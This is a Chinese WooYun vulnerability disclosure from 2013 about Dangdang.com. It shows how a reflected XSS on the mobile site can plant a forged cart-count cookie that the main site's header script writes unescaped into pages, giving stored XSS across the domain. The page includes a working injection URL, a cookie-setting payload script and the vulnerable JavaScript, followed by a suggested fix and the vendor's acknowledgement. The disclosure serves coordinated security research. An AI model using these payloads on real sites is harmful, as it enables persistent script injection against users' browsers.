当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017527

漏洞标题:当当网:二级域反射XSS变身所有域下存储XSS

相关厂商:当当网

漏洞作者: 八折

提交时间:2013-01-19 12:54

修复时间:2013-03-05 12:54

公开时间:2013-03-05 12:54

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-01-19: 细节已通知厂商并且等待厂商处理中
2013-01-19: 厂商已经确认,细节仅向厂商公开
2013-01-29: 细节向核心白帽子及相关领域专家公开
2013-02-08: 细节向普通白帽子公开
2013-02-18: 细节向实习白帽子公开
2013-03-05: 细节向公众公开

简要描述:

1.二级甚至三级域下的反射XSS是不是很鸡肋?
2.只能XX自己的XSS是不是更鸡肋?(如更改user-agent可弹框这种,你懂的)
1+2=所有域下存储XSS.
只是为了好玩~~

详细说明:

1.登录当当后,页面顶部的用户昵称、购物车数量等是js从COOKIE中读出来加载的,伪造COOKIE即可形成存储型XSS(几乎所有域下,即使用户不登录或退出,都不影响COOKIE里购物车数量,本例XSS有效至2020年,看官按口味可自行调整).

QQ20130119-1.png


2.找到手机当当下一处反射XSS,加载更改COOKIE中购物车数量的js代码。
http://m.dangdang.com/touch/leavemsg.php?sid=3d41%22%3E%3Cscript%20src=http://localhost/test/dd.js%3E%3C/script%3E%3C%22
dd.js代码:

document.cookie = "cart_items_count=%u003c%u0069%u006d%u0067%u0020%u0073%u0072%u0063%u003d%u0031%u0020%u006f%u006e%u0065%u0072%u0072%u006f%u0072%u003d%u0061%u006c%u0065%u0072%u0074%u0028%u0031%u0029%u003e;Domain=dangdang.com;Path=/;expires="+new Date().toGMTString().replace('2013','2020');
location.href="http://www.dangdang.com";


当当解析COOKIE的js部分:
http://www.dangdang.com/Found/pagetop_2012.js

if(usernick==""){
        xinshou = "<a name=\"dl\" href=\"java"+"scr"+"ipt:PageTopLogIn();\" target=\"_self\" class=\"login_link\">登录</a><a name=\"zc\" href=\"java"+"scr"+"ipt:PageTopRegist();\" target=\"_self\" class=\"login_link\">免费注册</a>";
    }else{
        chakanlk = " [<a name=\"tc\" href=\"java"+"scr"+"ipt:PageTopSignOut();\" target=\"_self\">退出登录</a>]";
        xinshou = "";
        var cartItemsCount=getCookie_one("cart_items_count","");
        if(cartItemsCount!=null&&cartItemsCount.length>0&&cartItemsCount!="undefined")
        {
            var cic=document.getElementById("cart_items_count");
            if(cic!=''){
                cic.innerHTML="("+cartItemsCount+")";  //这位置,读出COOKIE里的值直接输出在了页面上,造成XSS
            }
        }
    }

漏洞证明:

视频带感~~

密码: ddxss

修复方案:

cic.innerHTML="("+cartItemsCount+")"; 及其它相关位置再次过滤,或不从COOKIE里读取

版权声明:转载请注明来源 八折@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-01-19 13:42

厂商回复:

非常感谢。我们会尽快修补。多谢八折洞主,希望有机会到当当购物,争取给你打个“八折”。 :)

最新状态:

暂无

漏洞评价:

评论

  1. 2013-01-19 13:01 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    我擦 这不是可以做后门么

  2. 2013-01-19 13:40 | blue 认证白帽子 ( 普通白帽子 | Rank:779 漏洞数:70 | 我心中有猛虎,细嗅蔷薇。)

    xss猥琐流~

  3. 2013-01-20 14:54 | Chnhawk ( 路人 | Rank:0 漏洞数:1 | 菜鸟安全 菜鸟黑客 0day)

    才八折 真抠门。

  4. 2013-01-22 08:54 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    这个要收藏,留爪印

  5. 2013-02-19 12:27 | Csser ( 路人 | Rank:11 漏洞数:6 )

    有机会八折,有机会,有机会、、、、

  6. 2013-03-05 14:26 | Nimda ( 路人 | Rank:13 漏洞数:3 | 人的欲望就是一个超级大坑,永远也填不满。...)

    搞cookie球了。。